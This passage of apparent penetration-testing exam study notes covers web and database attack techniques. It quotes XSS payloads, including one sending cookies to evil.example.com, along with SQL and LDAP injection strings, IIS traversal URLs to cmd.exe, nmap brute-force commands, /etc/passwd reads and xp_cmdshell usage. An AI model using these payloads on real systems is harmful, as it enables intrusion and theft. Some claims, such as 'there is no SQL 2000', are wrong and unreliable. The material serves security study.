"http://scanme.nmap.org:20/"> ]> G6 - Web Programming Languages Common web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript JSP (Java Server Pages) and ASP (Active Server Pages) are two of the commonly used server-side scripting languages that are used today in web development. ... ASP code are interpreted on the fly each time it is accessed while JSP pages can either be interpreted or compiled into a servlet. PHP A common practice in PHP is to escape parameters using the function called mysql_real_escape_string() before sending the SQL query. Eval() – Evaluate a string as PHP code. This is often used by an attacker to hide their code and tools on the server itself. You can configure php to disable eval(). The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. To restrict PHP information leakage, disable expose_php - expose_php = On File uploads - You can disable file uploads using php - file_uploads=Off Turn Off Remote Code Execution - If enabled, allow_url_fopen allows PHP’s file functions — such as file_get_contents() and the include and require statements — can retrieve data from remote locations, like an FTP or web site - allow_url_fopen=Off Enable SQL Safe Mode - sql.safe_mode=On Disable Dangerous PHP Functions - disable_functions =exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file, show_source (but not call())
- 57. PHP Safe Mode PHP Safe Mode - PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now. This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0. Some of the major limitations of Safe Mode include the following. PHP File Uploads: On the DV server, the webserver runs as the Apache user. So, all files that are uploaded via PHP are owned by Apache. This may cause ownership problems for many users. File Modifications: Moving, copying, and changing ownership and permissions of files can only be done when they are owned by the administrative user. System Commands: PHP scripts cannot use the exec() and system() functions, which means that shell commands cannot be run from within a PHP script. Most script kiddie try to exploit php application such as WordPress using exec(), passthru(), shell_exec(), system(), popen, proc_open functions. exec — Execute an external program, shell_exec — Execute command via shell and return the complete output as a string system — Execute an external program and display the output __call – PHP magic function, the __ reserves the function name as magical. Not used for system commands. If the safe_mode directive is enabled, PHP places restrictions on the use of some dangerous functions. Some functions are disabled, and others are subject to limitations on their use. For example: The shell_exec function is disabled because it can be used to execute operating system commands. The mail function has the parameter additional_parameters disabled because unsafe use of this parameter may lead to SMTP injection flaws The exec function can be used only to launch executables within the configured safe_mode_exec_dir. Metacharacters within the command string are automatically escaped. If the magic_quotes_gpc directive is enabled, any single quote, double quote, backslash, and NULL characters contained within request parameters are automatically escaped using a backslash. allow_url_fopen - If disabled, this directive prevents some file functions from accessing remote files allow_url_include If disabled, this directive prevents the PHP file include functions from being used to include a remote file. display_errors If disabled, this directive prevents PHP errors from being reported to the user’s browser. file_uploads If enabled, this directive causes PHP to allow file uploads over HTTP. upload_tmp_dir Temporary directory used to store uploaded files. Ensures sensitive files are not stored in a worldreadable location. G7 - Web Application Servers Vulnerabilities in common application frameworks, servers and technologies: .NET, J2EE, Cold fusion, Ruby on Rails and AJAX. G8 - Web APIs Application interfaces: CGI (like my old contact us Perl script), ISAPI filters (like iirf.ini) and Apache modules (like mod_mysql). G9 - Web Sub-Components Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X. A thin web application can be considered as having a centrally operational or managed applications. For example, a web application running through a central operational server while its users don’t have to hold all necessary software or hardware packages. Because, all the processes will be operated centrally and not from the user’s side.
- 58. Whereas, a Thick application, for example, a device or platform running Microsoft’s heavy applications on specific hardware. Hence these can be defined as thick applications. All operations and processing are done locally as thick applications don’t depend on any centrally managed server or unit. Flash Flash objects run in the Flash virtual machine, and, like Java applets, are sandboxed from the host computer. Flash Player security follows a sandbox security model. This means that files and other data gathered by the Flash Player are sorted in isolated security sets called sandboxes. https://twitter.com/testalways/status/990623934599938048?s=09 To decompile and disassemble Flash, you can use the following tools: Flasm — www.nowrap.de/flasm Flare — www.nowrap.de/flare SWFScan — www.hp.com/go/swfscan (this works for Actionscript 2 and 3) .Net Thick Clients Java Applets Buffer overflow in Java Applets? Java - Sandbox Model Automatic garbage collection Secure class loading and verification mechanism ensures that only legitimate Java code is executed. A Java Code Signing Certificate allows you to sign all kinds of Java applications and applets. When you sign your Java code using a Java Code Signing Certificate, your users will know that it comes from a trusted source (you) and that it hasn't been tampered with since you signed it. Sandbox provides a very restricted environment in which to run untrusted code obtained from the open network The essence of the sandbox model is that local code is trusted to have full access to vital system resources (such as the file system) while downloaded remote code (an applet) is not trusted and can access only the limited resources provided inside the sandbox. One of the most significant advantages of languages such as C# and Java are that programmers do not need to worry about the kind of buffer management and pointer arithmetic problems that have affected software developed in native languages such as C and C++ Stack and Heap There are two main types of data structures in a process that are used for memory management, the stack and the heap. The stack is a LIFO (last in first out) structure (like a pile of plates), that is used mainly for storage of local variables and data related to function calls. Buffer overflow vulnerabilities occur when an application copies user-controllable data into a memory buffer that is not sufficiently large to accommodate it. The destination buffer is overflowed, resulting in adjacent memory being overwritten with the user’s data. Stack Overflows: Buffer overflows typically arise when an application uses an unbounded copy operation (such as strcpy in C) to copy a variable-size buffer into a fixed-size buffer without verifying that the fixed-sized buffer is large enough. Heap Overflows: Same kind of unsafe operation as described previously, except that the overflowed destination buffer is allocated on the heap, not the stack. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data.
- 59. AJAX The name originally was an acronym for “Asynchronous JavaScript and XML,” although in today’s web Ajax requests need not be asynchronous and need not employ XML. With Ajax, some user actions are handled within client-side script code and do not cause a full reload of the page. Instead, the script performs a request “in the background” and typically receives a much smaller response that is used to dynamically update only part of the user interface. The core technology used in Ajax is XMLHttpRequest. De-compilation of client-side code Java: JAD
- 60. Appendix H: Web Testing Methodologies H1 - Web Application Reconnaissance Benefits of performing application reconnaissance. Discovering the structure of web applications. Methods to identify the use of application components defined in G1 to G9. H2 - Threat Modelling and Attack Vectors Simple threat modelling based on customer perception of risk. Relate functionality offered by the application to potential attack vectors. H3 - Information Gathering from Web Mark-up Examples of the type of information available in web page source that may prove useful to an attacker: Hidden Form Fields Database Connection Strings Credentials Developer Comments Other included files Authenticated-only URLs H4 - Authentication Mechanisms Common pitfalls associated with the design and implementation of application authentication mechanisms. Brute Force Password complexity Password Recovery Mechanism Store Passwords in a Secure Fashion Transmit Passwords Only Over TLS or Other Strong Transport Authentication and Error Messages H5 - Authorisation Mechanisms Common pitfalls associated with the design and implementation of application authorisation mechanisms. User roles must be enforced on all endpoints H6 - Input Validation The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation. A Blacklist refers to the testing of a desired input against a list of negative inputs. Thus, you would compile a listing of all the negative or bad conditions and then go on to verify that the input received is not one among the bad or negative conditions.
- 61. A Whitelist refers to the testing of a desired input against a list of possible correct inputs. For this, you would compile a list of all the good input values/conditions, then verify that the input received is one of this correct condition. For example, consider automatically rejecting incoming phone calls. You could have a black list of marketing companies, so everyone but them would be able to call you. Or you could have white list containing your friends' numbers, so only they would be able to call you. H7 - Application Fuzzing Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications. H8 - Information Disclosure in Error Messages How error messages may indicate or disclose useful information. H9 - Use of Cross Site Scripting Attacks (XSS) Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker. The double forward slash // is a comment in JavaScript JavaScript – Document.Cookie Alert Box <script>alert("I am an alert box!");</script> Note the close bracket is followed by a ; Also works with single or double quotes, but not when Alert box in < > or when either ' or " are missing from ( ). There can be as many <<< >>> in script: <<<script>alert("I am an alert box!");</script>>>>>>>>>>>>>>>>> Same as SQL, the quotes represent strings (remember never quote integers). There is difference between using single or double quotes. Document.Cookie Document.Cookie – The following when saved as bookmark will as above display contents of alert box in browser: javascript:alert('document.cookie'); ...but remove the ‘ ‘ (single or double) and it’ll return the cookies in pop-up alert box for the site loaded, hence the contained text stops being a string and become code:
- 62. Will return cookies of site if the XSS is loaded by stored XSS. document.write(document.cookie); - This will print the cookie in the browser (as opposed to pop-up of alert) <script>document.cookie = "username=Logged into Internet Bank"; </script> - You can create cookie using document.cookie. <<script>alert<”XSS”>;//<</script> # Invalid JS, invalid < > plus // comment </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <SCRIPT/SRC=”http://ha.ckers.org/xss.js”></SCRIPT> ”;alert(‘XSS’);// # No <Script> - will not run… <BODY ONLOAD=alert(‘XSS’)> # No <Script> - will not run… <FRAMESET><FRAME SRC=’javascript:alert(‘XSS’);”></FRAMESET> # No <Script> - will not run… window.location='http://evil.example.com/?cookie='+document.cookie <a href="javascript:alert('myxssruns')">Click Me</a> javascript:alert(1) <a href="javascript:alert(1)">Skip</a> javascript://%0d%0aalert(1); javascript://%0d%0aalert(1);//http://derp.com javascript://%0d%0alert(1);//.com search/"><imgsrc=x onerror=alert(1); <script>alert(12345)</script> H10 - Use of Injection Attacks Potential implications of injection vulnerabilities: SQL injection Use of ' Integer values will not be in quotes (as quoting them will turn them into strings - don't quote numbers). Strings such as username, password, resource name will be in ' ' and for them add the ' at the end as maybe the coder did not enter ' to indicate start of user entered variable. The final '; will be in the SQL code (assuming integer value used). On client side you do not add. For example: ' OR '1'='1 in query will be '' OR '1'='1'; If you cut into query by commenting out end of query in code then add '; ...though I have seen ' being added at end so the injected query will be with your entered ' ' This was for BLIND based which may be string data. For example: Password box: ' AND (SELECT id FROM user LIMIT 1)=' which leads to query: SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = ''; Examples from book – Note all start with ‘ “ OR, integers are not quoted, and line ends with comment or nothing.
- 63. ‘ OR 1=1-- “ OR 1=1-- OR 1=1-- ‘ OR ‘a’=’a “ OR “a”=”a ‘) OR (‘a’=’a BLIND Based SQL Injection Microsoft SQL: ?id=1' waitfor delay '00:00:10'— can also use WAITFOR TIME 'hh:mm:ss' (WAIT FOR TIME is rarely used, but it could help bypassing weak blacklist filters only checking for the popular WAIT FOR DELAY instruction.) MySQL: BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')) – can also use sleep(10) Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the expression is True. Above will execute the ENCODE function 5000000 times. PostgreSQL: pg_sleep() - pg_sleep(10) Oracle: The SLEEP() function can be used, however it needs to be integrated in a PL/SQL block: BEGIN DBMS_LOCK.SLEEP(15); END; LDAP injection Query Types - Simple match conditions, Disjunctive (several search queries from several sources, like multiple ORs), Conjunctive (like username and password) The main way LDAP stores names is based on DN (distinguished name). A DN might look like this: cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu There are certain characters that are considered special characters (Boolean conditions and group aggregations) in a DN. The exhaustive list is the following: ',','','#','+','<','>',';','"','=', and leading or trailing spaces (but no ? – remember you cannot escape ? in Perl either…) Active Directory requires that the following ten characters be escaped with the backslash "" escape character if they appear in any of the individual components of a distinguished name: Some characters that are allowed in distinguished names and do not need to be escaped include: * ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! ' # Hence anything but Boolean, except for or | LDAP injection is a server-side attack, which could allow sensitive information about users and hosts represented in an LDAP structure to be disclosed, modified, or inserted. This is done by manipulating input parameters afterwards
- 64. passed to internal search, add, and modify functions. A web application could use LDAP in order to let users authenticate or search other users' information inside a corporate structure. Boolean conditions and group aggregations on an LDAP search filter could be applied by using the following metacharacters: Let's suppose we have a web application using a search filter like the following one: searchfilter="(cn="+user+")" which is instantiated by an HTTP request like this: http://www.example.com/ldapsearch?user=John If the value 'John' is replaced with a '*', by sending the request: http://www.example.com/ldapsearch?user=* the filter will look like: searchfilter="(cn=*)" which matches every object with a 'cn' attribute equals to anything. If the application is vulnerable to LDAP injection, it will display some or all of the users' attributes, depending on the application's execution flow and the permissions of the LDAP connected user. A tester could use a trial-and-error approach, by inserting in the parameter ( | & * and the other characters, in order to check the application for errors. By using the following values: user=*)(uid=*))(|(uid=* pass=password the search filter will results in: searchlogin="(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"; which is correct and always true. This way, the tester will gain logged-in status as the first user in LDAP tree. Characters that may be used to interfere with the LDAP query should be blocked, including: ( ) | & * ) ; , = and the null byte (%00)
- 65. Code injection XML injection - XXE An XML External Entity attack occurs an application which parses XML input, and a reference to an external entity is processed by a weakly configured XML parser. (Does not have to be an external XML, can be external any file – exam asked this) CRLF Injection The term CRLF refers to Carriage Return (ASCII 13, r) Line Feed (ASCII 10, n). Also known as HTTP response splitting. In Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. Often used for cache poisoning or XSS. Some web apps use the user-input to generate headers for their response, such as select language. The application does not filter input so user can set language=english%0d%0a at which point a new line is created or to create XSS payload in response. Location and Set-Cookie are the most likely headers for this attack. In a CRLF injection vulnerability attack the attacker inserts carriage return, linefeed both of the characters into user input to trick the server, web application or the user into thinking that an object is terminated and another one has started. /index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit %0d and %0a is the url encoded form of CR and LF. Therefore, the log entries would look like this after the attacker inserted those characters and the application displays it: IP - Time - Visited Path 123.123.123.123 - 08:15 - /index.php?page=home& 127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit By exploiting a CRLF injection vulnerability the attacker can fake entries in the log file to obfuscate his own malicious actions. HTTP Smuggling – Using CRLF to bypass Application Firewalls by splitting request up, though not a vulnerability in the application, but the App Firewall.
- 66. H11 - Session Handling Common pitfalls associated with the design and implementation of session handling mechanisms. Cookies – XSS, Transport: Session Cookie restricted to Secure Channel HTTP itself is a stateless protocol, and session management enables the application to uniquely identify a given user across a number of different requests and to handle the data that it accumulates about the state of that user's interaction with the application. Session tokens should only be stored in non-persistent cookies. Generation of Cookie values for session – predictable? H12 - Encryption Common techniques used for encrypting data in transit and data at rest, either on the client or server side. PGP: To encrypt data, PGP generates a symmetric key to encrypt data which is protected by the asymmetric key. PGP can be used to send messages confidentially. For this, PGP combines symmetric-key encryption and public-key encryption. The message is encrypted using a symmetric encryption algorithm, which requires a symmetric key. Each symmetric key is used only once and is also called a session key. The message and its session key are sent to the receiver. The session key must be sent to the receiver so they know how to decrypt the message, but to protect it during transmission it is encrypted with the receiver's public key. Only the private key belonging to the receiver can decrypt the session key. RC algorithm: The RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. Despite the similarity in their names, the algorithms are for the most part unrelated. There have been six RC algorithms so far. Common Symmetric Encryption Algorithms: AES (Advanced Encryption Standard), Blowfish, DES (Data Encryption Standard), Triple DES, Serpent, Twofish, RC. Common Asymmetric Encryption Algorithms: RSA, EEC, DSA. MD5 – Salted: hash(pass+salt) - When a user picks or is assigned a password, it is encoded with a randomly generated value called the salt. This means that any particular password could be stored in 4096 different ways. The salt value is then stored with the encoded password. When a user logs in and supplies a password, the salt is first retrieved from the stored encoded password. Salting protects against: rainbow tables (pre-calculated hashes) dictionary attacks (often included in the above) finding identical passwords if you crack one (without salt everybody that has password as their password will have same hash) Contents of /etc/shadow: [root@slashroot1 ~]# cat /etc/shadow root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7::: The first field is a numerical number that tell's you the hashing algorithm that's being used. $1 = MD5 $2 =Blowfish $2a=eksblowfish $5 =SHA-256 $6 =SHA-512 Algorithm The second field is the salt value, the last field is the hash value of salt+user password.
- 67. Salt value is Etg2ExUZ. You can reproduce the same output by providing the salt value of Etg2ExUZ and the original password. [root@slashroot1 ~]# openssl passwd -1 -salt Etg2ExUZ redhat $1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1 [root@slashroot1 ~]# You can see that the encoded entry can only be reproduced with the exact same salt value (which is always randomly selected by the password program). Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes) Base64 Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME content transfer encoding. Each base64 digit represents exactly 6 bits of data. Three 8-bit bytes (i.e., a total of 24 bits) can therefore be represented by four 6-bit base64 digits. Base64 is not encryption -- it's an encoding. It's a way of representing binary data using only printable (text) characters. While encoding the user name and password with the Base64 algorithm typically makes them unreadable by the naked eye, they are as easily decoded as they are encoded. Security is not the intent of the encoding step. Rather, the intent of the encoding is to encode non-HTTP-compatible characters that may be in the user name or password into those that are HTTP-compatible. Example of Base64: TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4= The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional corruption. Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack and suffers from extensive vulnerabilities. The 128-bit (16-byte) MD5 hashes (also termed message digests) are typically represented as a sequence of 32 hexadecimal digits. The following demonstrates a 43-byte ASCII input and the corresponding MD5 hash: MD5("The quick brown fox jumps over the lazy dog") = 9e107d9d372bb6826bd81d3542a419d6 Percent Encoding Used in URL encoding. Reserved characters have special meanings in the context of URLs and must be encoded into another form, which is the percent-encoded form to avoid any sort of ambiguity. Reserved characters have special meanings in the context of URLs and must be encoded into another form, which is the percent-encoded form to avoid any sort of ambiguity. A classic example of such ambiguity can be /, which is used to separate paths in a URL, so if the necessity arises to transmit the / character in a URL then we must encode it accordingly, so that the receiver or parser of the URL does not get confused and parse the URL incorrectly. Therefore, in that case / is encoded into %2F, this will be decoded into / by the URL parser.
- 68. . = %2E (ASCII – as unrestricted character) = %5C /= %2F : = %3A < = %3c > = %3e It is also possible to encode unrestricted characters by providing an equivalent ASCII hexadecimal code for the character, preceded by %. For example, if we had to encode A into percent encoding, we can simply provide %41; here, 41 is the hexadecimal for 65, which, in turn, is the ASCII code for capital A. Lowercase a is %61. Double Percent Encoding Double percent encoding is the same as percent encoding with a twist that each character is encoded twice instead of once. %25 is added, therefore if double encoding / , then it’ll be %252F IIS 5.0 directory traversal code execution – CVE-2001-0333 Normal URL: http://example.com/scripts/../../winnt/system32/cmd.exe?/c+dir+c: Double-encoded URL: http://example.com/scripts/%252E%252E%252F%252E%252E%252Fwinnt/ system32/cmd.exe?/c+dir+c: http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: Unicode Attack The double decode value %255c can be substituted for a variety of Unicode representations of the or / characters such as %c0%af, %c1%9c, %c1%pc, %c0%qf, %c1%8s, %c1%1c, %c1%af, and %e0%80%af. The selection of a successful Unicode representation of and /, based upon the language character set installed and running on the host.
- 69. http://TARGET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: Encryption transforms data (plain-text) into another format in such a way that only specific individual(s) can reverse the transformation (using a Cipher). Encryption is for maintaining data confidentiality and thus the ability to reverse the transformation (keys) are limited to certain people. Encryption, applies a transformation to a piece of data that can only be reversed with specific (and secret) knowledge of how to decrypt it. Identification of common SSL vulnerabilities POODLE (CVE-2014-3566) - The Padding Oracle on Downgraded Legacy Encryption (POODLE) attack was published in October 2014 and takes advantage of two factors. The first is the fact that some servers/clients still support SSL 3.0 for interoperability and compatibility with legacy systems, and the second factor is a vulnerability that exists in SSL v3.0 which is related to Block Padding. The Client initiates the Handshake and sends the list of the supported SSL/TLS versions. An attacker intercepts the traffic, performing a Man-in-The-Middle (MiTM) attack, and impersonates the Server until the Client agrees to downgrade the connection to the vulnerable SSL 3.0. BEAST (CVE-2011-3389) - The Browser Exploit Against SSL/TLS attack was published in September 2011 and affects SSL 3.0 and TLS 1.0. An attacker can “decrypt” data exchanged between two parties by taking advantage of a vulnerability in the implementation of the Cipher Block Chaining (CBC) mode in TLS 1.0 which allows them to perform chosen plaintext attack. H13 - Source Code Review First step is to mirror the remote server to your local system. GNU Wget. Sam Spade can be used to identify hidden fields and email addresses. Common techniques for identifying and reviewing deficiencies in the areas of security. Black box (automated) and White box (manual) testing. Static and Dynamic testing. Define scope: Which vulnerabilities you need to look for, such as OWASP Top 10, SANS, etc… One can try to review them as much as possible, if not all of them. Then you can deduce how many of them can be detected using tools and which are best suited for manual review. Categorize the vulnerabilities: What is your priority. The following are a few categories you can look at: Authorization Authentication Injection flaws Improper error handling/Exception flaws Encryption (Cryptography) Auditing and Logging Session related flaws (Session management) Insecure configuration Distrust User Input
- 70. Appendix J: Databases MS-SQL 1433/TCP MS-SQL-SSRA 1434/UDP MS-SQL-HIDDEN 2433/TCP ORACLE-TNS 1521/TCP ORACLE-TNS-ALT 1526/TCP ORACLE-TNS-ALT 1541/TCP MYSQL 3306/TCP J1 - Microsoft SQL Server Knowledge of common attack vectors for Microsoft SQL Server. nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info x.x.x.x nmap -p1433 --script ms-sql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt x.x.x.x SA account and default DBs MS SQL Server 2008 (and 2005) contain five special databases: master, model, tempdb, msdb, and mssqlsystemresource (aka Resource) Nessus Finding: The remote instance of MS SQL / SQL Server has the default 'sa' account enabled without any password. C:MSSQL7 EXEC sp_password NULL, .password., .sa. go exit SQL Server 7.0 is released in 1998 - Last edition of blank SA password and xp_cmdshell enabled by default. Note there is no SQL 2000! Next versions where SQL Server 2005, 2008, 2017 Understanding of privilege escalation and attack techniques for a system compromised via database connections. xp_cmdshell (not xp_cmd_shell) - Disabled in 2005 and 2008 by default (hence only enabled in SQL 7) Hidden Port: 2433 TCP EXEC xp_cmdshell 'dir *.exe'; # Exec not run… GO Get version: @@VERSION Load file: SELECT * FROM OPENROWSET(BULK ‘C:TempDJ1885.txt’ , FORMATFILE=‘C:TempDJ1885.fmt’) AS Test Reading Registry - EXEC (or is it Exec?) master..xp_regread 'hKey','Key Value','String Value',@outvar OUTPUT Writing Registry - EXEC master..xp_regwrite 'hKey','Key Name','String Value','Data type','Value to write' (Exam: can regwrite be used for privilege escalation?) Deleting Registry String - EXEC master..xp_regdeletevalue 'hKey','Key Name','String Value' J2 - Oracle RDBMS Get Oracle version: SELECT * FROM V$VERSION or SELECT version FROM V$INSTANCE SID = Oracle SID is the unique name that uniquely identifies your instance/database (database name + instance number). if your database name is somedb and your instance number is 3, then your SID is somedb3. TNS - Transparent Network Substrate (TNS) is the network protocol used by Oracle for connectivity to Oracle Databases. The Oracle Database Listener is the server process that provides basic network connectivity for clients, application servers, and other databases to an Oracle database.
- 71. When enumerating Oracle, the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP). $ ./tnscmd.pl status -h 192.168.0.2 sending (CONNECT_DATA=(COMMAND=status)) to 192.168.0.2:1521 writing 89 bytes reading . .......6.........E. ...........O........(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF) (VERSION=TNSLSNR for 32-bit Windows: Version 10.2.0.5.0 - Production)(START_DATE=30-MAY-2007 02:00:25) In the above example we have discovered an Oracle 10g database. Once we have access to the listener the next step is to enumerate the SID. There are a number of tools (Kali, Nmap Scripts) to brute force the SID which once you have, the next step is account enumeration. Review the default username and passwords. Derivation of version and patch information from hosts running Oracle software. nmap x.x.x.x -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script- args oracle-enum-users.sid=ORCL,userdb=orausers.txt TNS listener on TCP 1521 (sometimes 1526,1541). msf > use auxiliary/admin/oracle/tnscmd Or use tnscmd.pl (stored under /Files and Software - remember to take for CREST lab) perl tnscmd.pl -h 192.168.0.13 (default command = ping) perl tnscmd.pl version -h 192.168.0.13 -- VSNNUM=186647040 VSNNUM=135294976 – Conduct Decimal to HEX conversion (Windows Calc Programmer setting) - 810 7000 hence version 8.1.7 (seem to ignore the 0's.. as it is 8107000 and is book is written as 08107000) [oracle@DCG023 8828328]$ opatch lsinventory perl tnscmd.pl status -h 192.168.0.13 Better approach is NSE script: nmap --script=oracle-sid-brute -p 1521 x.x.x.x - which returns correctly version is Oracle XE (Express Edition) | oracle-sid-brute: |_ XE ...then having got the SID: nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE 192.168.0.13 - this will check common account, specify your own list as below. nmap --script oracle-brute -p 1521 --script-args oracle- brute.sid=XE,userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.13 Default Oracle accounts. perfstat:perfstat => Valid credentials | scott:tiger => Valid credentials (Source) Oracle Database installs with several default database user accounts. Upon successful installation of the database, the Database Configuration Assistant automatically locks and expires most default database user accounts. However, if you performed a manual installation, then no default database users are locked upon successful installation of the database server. Or, if you have upgraded from a previous release of Oracle Database, you may have default accounts from earlier releases.
- 72. If you install Oracle Enterprise Manager, the SYSMAN and DBSNMP accounts are open, unless you configure Oracle Enterprise Manager for central administration. In this case, the SYSMAN account (if present) will be locked. If you do not install Oracle Enterprise Manager, then only the SYS and SYSTEM accounts are open. Database Configuration Assistant locks and expires all other accounts (including SYSMAN and DBSNMP). The default accounts that are created when you create a database, are the HR, OE, and SCOTT accounts. Default Usernames and Passwords ANONYMOUS ANONYMOUS CTXSYS CTXSYS DBSNMP DBSNMP LBACSYS LBACSYS MDSYS MDSYS ORDPLUGINS ORDPLUGINS ORDSYS ORDSYS OUTLN OUTLN WKSYS WKSYS WMSYS WMSYS OLAPSYS MANAGER SCOTT TIGER SYSMAN OEM_TEMP SYSTEM MANAGER SYS CHANGE_ON_INSTALL XDB CHANGE_ON_INSTALL Oracle Port Filtering – Valid Node Checking (VNC) Oracle Database Listener allows for filtering of Oracle DB connections through the Valid Node Checking (VNC) feature. The Oracle database Listener validates the IP address (or host name) of the incoming client machine against the “allow” or “deny” rules specified in sqlnet.ora file before opening up a connection to the database. This feature and has been available since Oracle8. Specify permitted IPs through tcp.invited_nodes or deny rules through tcp.excluded_nodes. Beginning with Oracle11g R2, allow and deny rules, can include wild cards and CIDR notations. tcp.validnode_checking = YES tcp.excluded_nodes = {list of IP addresses} tcp.invited_nodes = {list of IP addresses} MySQL Get version: select version(); Load file: select load_file("/etc/passwd"); ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('',({INJECTION}), 'yourhost.com')))
- 73. J3 - Web / App / Database Connectivity Common databases (Oracle, MySQL and Access) and the connection and authentication methods used by web applications. MSSQL SQL Server authentication ODBC ActiveX Data Objects (ADO) connection string Windows NT authentication Basic authentication must be enabled for the Web application. Oracle Web applications access a data source using a connection, and a DataSource object can be thought of as a factory for connections to the particular data source that the DataSource instance represents. The OCI8 extension provides three different functions for connecting to Oracle. The standard connection function is oci_connect(). This creates a connection to an Oracle database and returns a resource used by subsequent database calls. PHP provides Oracle OCI8 functions. Other options are PDO with the Oracle Driver and (if oracle supports it) ODBC. Misc. Daytime Protocol The Daytime Protocol – TCP and UDP 13 (based on RFC, but Wikipedia says just UDP 13) A host may connect to a server that supports the Daytime Protocol on either Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) port 13. The server returns an ASCII character string of the current date and time in an unspecified format. Output: Monday, February 22, 1982 18:45:59-PST Time Protocol The Time Protocol provides a site-independent, machine readable date and time. A host connects to a server that supports the Time Protocol on port 37 (TCP or UDP). The server then sends the time as a 32-bit unsigned integer in binary format and in network byte order, representing the number of seconds since 00:00 (midnight) 1 January, 1900 GMT, and closes the connection. Operation over UDP requires the sending of any datagram to the server port, as there is no connection setup for UDP. Many Unix-like operating systems used the Time Protocol to monitor or synchronize their clocks using the rdate utility, but this function was superseded by the Network Time Protocol (NTP) and the corresponding ntpdate utility. NTP is more sophisticated in various ways, among them that its resolution is finer than one second. Cisco Config Password Storage Cisco: We recommend that you use the enable secret command (do not use enable password) because it uses an improved encryption algorithm. If you configure the enable secret command, it takes precedence over the enable password command; the two commands cannot be in effect simultaneously. To determine which scheme has been used to encrypt a specific password, check the digit preceding the encrypted string in the configuration file. If that digit is a 7, the password has been encrypted using the weak algorithm. If the digit is a 5, the password has been hashed using the stronger MD5 algorithm.
- 74. enable password xxxxxxx stores password in clear text (type 0) enable password combined with service password-encryption requires someone looking over your shoulder to memorize a slightly harder phrase long enough to Google "crack type 7 password". #enable #configure terminal (config)#enable secret produces a hash (it does not encrypt) For example, in the configuration command (note the $1 for Hash MD5, $iUjJ for salt) #show running-config | include enable enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP Note the password is already hashed in MD5 format from above command, this is just showing the running config The enable secret has been hashed with MD5, whereas in the command: username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D The password has been hashed using the weak reversible algorithm. Type 0 - The password will not be hashed when router stores it in Run/Start Files enable password cisco123 Type 4 - The password will be hashed when router store it in Run/Start Files using SHA-256. This type is deprecated starting from IOS 15.3(3) enable secret 4 Rv4kArhts7yA2xd8BD2YTVbts Type 5 - The password will be hashed when router store it in Run/Start Files using MD5 enable secret 5 00271A5307542A02D22842 Type 7 - The password will be encrypted when router store it in Run/Start Files using Vigenere cipher Which any website with type7 reverser can crack it in less than one second <- AVOID ena password cisco123 service password-encryption In newer versions of Cisco's IOS, there are now Type 8 and Type 9 passwords. These are much more secure. Type 8 - The password will be 